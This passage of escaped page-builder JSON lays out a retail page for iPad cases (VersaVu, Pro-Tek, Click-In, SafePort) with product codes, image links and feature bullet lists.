id=\\\"product-features\\\"><li>Color Black \\/ Charcoal &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design enhances protection<\\/li><li>Reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision-cut access to controls, ports, and camera<\\/li><li>Audio-enhancing sound scoops boost sound performance<\\/li><li>Secure magnetic wrap closure<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876b52c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"060847f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"29c5815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9410617\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ef66c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b29bf2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da0f29b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0a24c5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a7e46e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"356bcf5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7e3c56\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8b4c09e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"178c12b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Click-In iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73608GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c0be7cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da27b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu <\\/strong><strong>iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc07dd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"76e312e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu Signature iPad 9.7\\\" <\\/strong><strong>2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73902GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a601f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6e3305b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cff07c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73608GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"Click-In Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d78178e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c49cf0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73803GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6eaf744\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"043a47e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73902GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Signature Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b4b865\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"246c1eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4857c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black\\/Charcoal, Rose Gold &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports, and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e18e471\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04d07d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal, Blue &amp; Red<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d27da\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9b51775\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe6de1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6895690\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cac6c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c724b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"afa9c21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c4b6b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a983d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0414077\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e27080\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"52a45e3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1748b19\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"24f99b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7472688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e19a656\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d135e68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek <\\/strong><strong>11-inch\\u00a0 <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c5f1a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"94b3c2d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74502GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc6acc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9268480\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0e368ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"039f013\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d9e6d7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"77e1d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e079a49\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"192\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8b54b12\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8672d06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d70140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black &amp; Gold<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ce129\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a2e1c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Precision cut access to controls, ports and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a76315d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c26b89d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a780230\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8102767\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e736638\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e712cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9336132\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3b49729\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f3df92b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6c073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b7d1d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e683a6d\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f005697\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"3c683c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cfc8d4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8d2137\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1467ed2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek\\u2122 <\\/strong><strong>Rotating Case <\\/strong><strong>12.9-inch iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ748GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"44f9857\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e380076\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Classic Case for <\\/strong><strong>12.9-inch <\\/strong><strong>iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ749GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c30185\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4ec1175\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23ccf88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c06e0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30b6c65\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"16573a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"44ec04c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"907f6a3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6718b07\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc7a527\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black, Red &amp; Burgundy<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6601d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27e4cb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design delivers practical protection and enhances stability<\\/li><li>Patented custom-molded tray with reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing<\\/li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"780ec47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb1d3b2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e704695\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"39b318b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"df3be40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba13e6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe249f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"278724c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"027329b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054db58\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6196c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"39f71bf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"208ace1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"dd3ee9d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"26b4f3b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>12.9-inch\\u00a0<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ750GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4a121f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"674bee1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>SafePort Rugged <\\/strong><strong>Case for <\\/strong><strong>12.9-inch iPad <\\/strong><strong>(6th gen. \\/ 5th gen.)<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD138GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2bed517\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aae738f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f6a9f2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Signature Series Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a7759bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c62f212\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\\\" width=\\\"189\\\" height=\\\"189\\\" 